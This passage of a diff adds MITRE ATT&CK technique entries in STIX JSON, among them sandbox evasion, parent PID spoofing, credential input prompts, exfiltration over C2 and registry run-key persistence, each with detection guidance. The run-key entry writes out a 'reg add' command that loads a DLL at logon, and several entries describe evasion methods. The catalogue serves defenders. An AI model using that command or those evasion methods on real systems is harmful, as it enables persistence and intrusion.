(n.d.). Retrieved January 24, 2020.", + "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + }, + { + "source_name": "Microsoft MOF May 2018", + "description": "Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved January 24, 2020.", + "url": "https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "CDNs", + "description": "Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.\n\nAdversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75", + "created": "2020-10-02T16:59:56.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1596/004", + "external_id": "T1596.004" + }, + { + "source_name": "DigitalShadows CDN", + "description": "Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020.", + "url": "https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "User Activity Based Checks", + "description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Deloitte Threat Library Team" + ], + "x_mitre_detection": "User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Static File Analysis", + "Signature-based detection", + "Host forensic analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", + "created": "2020-03-06T21:04:12.454Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1497/002", + "external_id": "T1497.002" + }, + { + "source_name": "Deloitte Environment Awareness", + "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.", + "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc" + }, + { + "source_name": "Sans Virtual Jan 2016", + "description": "Keragala, D. (2016, January 16). Detecting Malware and Sandbox Evasion Techniques. Retrieved April 17, 2019.", + "url": "https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667" + }, + { + "source_name": "Unit 42 Sofacy Nov 2018", + "description": "Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Input Prompt", + "description": "When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matthew Molyett, @s1air, Cisco Talos" + ], + "x_mitre_detection": "Monitor process execution for unusual programs as well as malicious instances of [Scripting](https://attack.mitre.org/techniques/T1064) that could be used to prompt users for credentials.\n\nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--91ce1ede-107f-4d8b-bf4c-735e8789c94b", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1141", + "external_id": "T1141" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/569.html", + "external_id": "CAPEC-569" + }, + { + "source_name": "OSX Malware Exploits MacKeeper", + "description": "Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017.", + "url": "https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html" + }, + { + "source_name": "LogRhythm Do You Trust Oct 2014", + "description": "Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018.", + "url": "https://logrhythm.com/blog/do-you-trust-your-computer/" + }, + { + "source_name": "OSX Keydnap malware", + "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", + "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/" + }, + { + "source_name": "Enigma Phishing for Credentials Jan 2015", + "description": "Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.", + "url": "https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-25T15:49:14.785Z", + "name": "Cloud Accounts", + "description": "Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)\n\nCreating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_contributors": [ + "Francesco Bigarella" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--926d8cfd-1d0d-4da2-ab49-3ca10ec3f3b5", + "created": "2022-05-27T14:06:05.130Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1585/003", + "external_id": "T1585.003" + }, + { + "source_name": "Awake Security C2 Cloud", + "description": "Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved May 27, 2022.", + "url": "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-12T03:40:37.954Z", + "name": "Software Deployment Tools", + "description": "Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager. \n\nAccess to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\n\nSaaS-based configuration management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to access specific functionality.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Shane Tully, @securitygypsy", + "Joe Gumke, U.S. Bank", + "Tamir Yehuda" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. \n\nOften these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.\n\nPerform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network", + "SaaS" + ], + "x_mitre_version": "3.0", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", + "created": "2017-05-31T21:30:57.201Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1072", + "external_id": "T1072" + }, + { + "source_name": "Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation", + "description": "ALEXANDER MARVI, BRAD SLAYBAUGH, DAN EBREO, TUFAIL AHMED, MUHAMMAD UMAIR, TINA JOHNSON. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved May 15, 2023.", + "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem" + }, + { + "source_name": "SpecterOps Lateral Movement from Azure to On-Prem AD 2020", + "description": "Andy Robbins. (2020, August 17). Death from Above: Lateral Movement from Azure to On-Prem AD. Retrieved March 13, 2023.", + "url": "https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d" + }, + { + "source_name": "Mitiga Security Advisory: SSM Agent as Remote Access Trojan", + "description": "Ariel Szarf, Or Aspir. (n.d.). Mitiga Security Advisory: Abusing the SSM Agent as a Remote Access Trojan. Retrieved January 31, 2024.", + "url": "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Exfiltration Over C2 Channel", + "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "William Cain" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [], + "x_mitre_network_requirements": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "created": "2017-05-31T21:30:41.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1041", + "external_id": "T1041" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Parent PID Spoofing", + "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Wayne Silva, F-Secure Countercept" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\n\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Heuristic Detection", + "Host Forensic Analysis" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", + "created": "2020-02-18T18:22:41.448Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1134/004", + "external_id": "T1134.004" + }, + { + "source_name": "XPNSec PPID Nov 2017", + "description": "Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019.", + "url": "https://blog.xpnsec.com/becoming-system/" + }, + { + "source_name": "CounterCept PPID Spoofing Dec 2018", + "description": "Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019.", + "url": "https://www.countercept.com/blog/detecting-parent-pid-spoofing/" + }, + { + "source_name": "Microsoft UAC Nov 2018", + "description": "Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019.", + "url": "https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works" + }, + { + "source_name": "Microsoft Process Creation Flags May 2018", + "description": "Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.", + "url": "https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags" + }, + { + "source_name": "Secuirtyinbits Ataware3 May 2019", + "description": "Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.", + "url": "https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3" + }, + { + "source_name": "DidierStevens SelectMyParent Nov 2009", + "description": "Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019.", + "url": "https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/" + }, + { + "source_name": "CTD PPID Spoofing Macro Mar 2019", + "description": "Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019.", + "url": "https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Gather Victim Org Information", + "description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", + "created": "2020-10-02T16:27:02.339Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1591", + "external_id": "T1591" + }, + { + "source_name": "ThreatPost Broadvoice Leak", + "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.", + "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/" + }, + { + "source_name": "SEC EDGAR Search", + "description": "U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021.", + "url": "https://www.sec.gov/edgar/search-and-access" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Registry Run Keys / Startup Folder", + "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in.\n\nThe startup folder path for the current user is:\n* C:\\Users\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\nThe startup folder path for all users is:\n* C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\n\nThe following run keys are created by default on Windows systems:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n* 